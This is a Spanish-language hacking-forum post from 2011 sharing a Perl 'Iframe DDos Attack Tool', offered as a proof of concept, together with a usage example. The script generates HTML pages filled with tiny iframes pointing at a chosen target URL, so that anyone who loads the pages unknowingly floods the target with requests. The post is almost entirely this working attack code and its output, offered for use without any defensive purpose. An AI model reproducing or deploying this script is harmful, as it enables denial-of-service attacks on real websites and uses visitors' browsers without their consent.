elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
29 Mayo 2012, 09:18  


Tema destacado:


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting (Moderadores: Novlucker, Leo Gutiérrez., EleKtro H@cker)
| | |-+  [Perl] Iframe DDos Attack Tool
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] Iframe DDos Attack Tool  (Leído 300 veces)
Doddy

Desconectado Desconectado

Mensajes: 220



Ver Perfil
[Perl] Iframe DDos Attack Tool
« en: 7 Octubre 2011, 01:15 »

Un simple poc para la los ataques de denegacion de servicio usando
iframes.


Código
#!usr/bin/perl
#Iframe DDos Attack Tool (C) Doddy Hackman 2011
 
use Cwd;
 
installer();
 
sub head {
print "\n\n-- == Iframe DDos Attack Tool == --\n\n";
}
 
sub copyright {
print "\n\n -- == Doddy Hackman 2011\n\n";
}
 
sub sintax {
print "\n[+] sintax : $0 <target> <count file> <count iframe>\n";
}
 
sub start {
my ($target,$files,$iframe) = @_;
print "\n[+] Starting the party\n\n";
print "[+] Generating files and iframes\n";
print "\n[+] All Save in ".getcwd()."/files/"."\n";
for my $can(1..$files) {
open (POC,">>files/index".$can.".html");
for my $tx(1..$iframe) {
print POC '<iframe src="'.$target.'" width="3" height="3"></iframe><br>';
}
close POC;
}
}
 
head();
unless(@ARGV > 2) {
sintax();
} else {
start($ARGV[0],$ARGV[1],$ARGV[2]);
}
copyright();
 
sub installer {
unless (-d "files/") {
mkdir("files/","777");
}}
 
# ¿ The End ?
 
Ejemplo de uso

Código:

C:\Documents and Settings\Administrador\Escritorio\Leviatan\Hacking\WarFactoy II
 Finales\poc iframe>poc.pl "pepo.com" 4 4


-- == Iframe DDos Attack Tool == --


[+] Starting the party

[+] Generating files and iframes

[+] All Save in C:/Documents and Settings/Administrador/Escritorio/Leviatan/Hack
ing/WarFactoy II Finales/poc iframe/files/


 -- == Doddy Hackman 2011



« Última modificación: 8 Octubre 2011, 18:59 por Doddy » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Posible ataque Ddos o Iframe ??
Seguridad
carla24 7 2,164 Último mensaje 8 Diciembre 2009, 20:05
por Azielito
[Tool][Perl] search-vul 0.4
Nivel Web
~ Yoya ~ 0 1,184 Último mensaje 7 Enero 2010, 20:58
por ~ Yoya ~
[C] Iframe DDOS
Programación C/C++
Doddy 0 360 Último mensaje 8 Enero 2012, 18:38
por Doddy
[Perl] BingHack Tool 0.1
Scripting
Doddy 0 25 Último mensaje 26 Mayo 2012, 16:02
por Doddy
[Perl Tk] BingHack Tool 0.1
Scripting
Doddy 10 213 Último mensaje Ayer a las 23:23
por Doddy
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines